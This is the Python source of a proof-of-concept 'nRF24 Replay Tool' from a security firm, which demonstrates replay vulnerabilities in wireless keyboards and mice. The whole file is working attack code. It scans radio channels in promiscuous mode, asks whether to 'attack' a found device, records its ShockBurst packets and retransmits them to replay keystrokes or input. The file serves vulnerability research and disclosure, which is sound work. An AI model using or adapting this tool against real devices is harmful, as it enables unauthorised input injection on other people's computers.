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simple_replay.py
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simple_replay.py
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#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Simple nRF24 Replay Tool
by Matthias Deeg <[email protected]>
Proof-of-Concept software tool to demonstrate replay vulnerabilities of
different wireless desktop sets using nRF24 ShockBurst radio communication
Copyright (C) 2016 SySS GmbH
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
__version__ = '0.2'
__author__ = 'Matthias Deeg'
import argparse
from binascii import hexlify, unhexlify
from lib import nrf24
from time import sleep, time
SCAN_CHANNELS = range(2, 84) # channels to scan
DWELL_TIME = 0.05 # dwell time for each channel in seconds
def banner():
"""Show a fancy banner"""
print(" _____ ______ ___ _ _ _____ _ _ \n"
" | __ \\| ____|__ \\| || | | __ \\| | | | \n"
" _ __ | |__) | |__ ) | || |_ | |__) | | __ _ _ _ ___ ___| |_ \n"
" | '_ \\| _ /| __| / /|__ _| | ___/| |/ _` | | | / __|/ _ \\ __| \n"
" | | | | | \\ \\| | / /_ | | | | | | (_| | |_| \\__ \\ __/ |_ \n"
" |_| |_|_| \\_\\_| |____| |_| |_| |_|\\__,_|\\__, |___/\\___|\\__|\n"
" __/ | \n"
" |___/ \n"
"Simple Replay Tool v{0} by Matthias Deeg - SySS GmbH (c) 2016".format(__version__))
# main program
if __name__ == '__main__':
# show banner
banner()
# init argument parser
parser = argparse.ArgumentParser()
parser.add_argument('-a', '--address', type=str, help='Address of nRF24 device')
parser.add_argument('-c', '--channels', type=int, nargs='+', help='ShockBurst RF channel', default=range(2, 84), metavar='N')
# parse arguments
args = parser.parse_args()
# set scan channels
SCAN_CHANNELS = args.channels
if args.address:
try:
# address of nRF24 keyboard (CAUTION: Reversed byte order compared to sniffer tools!)
address = args.address.replace(':', '').decode('hex')[::-1][:5]
address_string = ':'.join('{:02X}'.format(ord(b)) for b in address[::-1])
except:
print("[-] Error: Invalid address")
exit(1)
else:
address = ""
try:
# initialize radio
print("[*] Configure nRF24 radio")
radio = nrf24.nrf24()
# enable LNA
radio.enable_lna()
except:
print("[-] Error: Could not initialize nRF24 radio")
exit(1)
# put the radio in promiscuous mode with given address
if len(address) > 0:
radio.enter_promiscuous_mode(address[::-1])
else:
radio.enter_promiscuous_mode()
# set the initial channel
radio.set_channel(SCAN_CHANNELS[0])
# sweep through the channels and decode ESB packets in pseudo-promiscuous mode
print("[*] Scanning for wireless keyboard ...")
last_tune = time()
channel_index = 0
payloads = []
while True:
# increment the channel
if len(SCAN_CHANNELS) > 1 and time() - last_tune > DWELL_TIME:
channel_index = (channel_index + 1) % (len(SCAN_CHANNELS))
radio.set_channel(SCAN_CHANNELS[channel_index])
last_tune = time()
# receive payloads
value = radio.receive_payload()
if len(value) >= 10:
# split the address and payload
address, payload = value[0:5], value[5:]
# show packet payload
print("[+] Received data: {0}".format(hexlify(payload)))
payloads.append(payload)
# convert address to string and reverse byte order
converted_address = address[::-1].tostring()
address_string = ':'.join('{:02X}'.format(b) for b in address)
print("[+] Found nRF24 device with address {0} on channel {1}".format(address_string, SCAN_CHANNELS[channel_index]))
# ask user about device
if not args.address:
answer = raw_input("[?] Attack this device (y/n)? ")
if answer[0] == 'y':
break
else:
print("[*] Continue scanning ...")
else:
break
# put the radio in sniffer mode (ESB w/o auto ACKs)
radio.enter_sniffer_mode(converted_address)
# if a specific address was given, also replay the read packets during scanning
if args.address:
packets = payloads
else:
packets = []
recording = True
# record ShockBurst data communication
print("[*] Start recording (<CTRL+C> to stop recording)")
while recording:
try:
# receive payload
value = radio.receive_payload()
if value[0] == 0:
# split the payload from the status byte
payload = value[1:]
# add payload to list
packets.append(payload)
# show packet payload
print("[+] Received data: {0}".format(hexlify(payload)))
except KeyboardInterrupt:
print("\n[*] Stop recording")
recording = False
# set packet list
packet_list = packets
# replay ShockBurst data communication
replaying = True
while replaying:
try:
key = raw_input("[*] Press <ENTER> to replay the recorded data packets or <CTRL+C> to quit ...")
for p in packet_list:
print("[+] Send data: {0}".format(hexlify(p)))
radio.transmit_payload(p.tostring())
except KeyboardInterrupt:
print("\n[*] Stop replaying")
replaying = False
print("[*] Done.")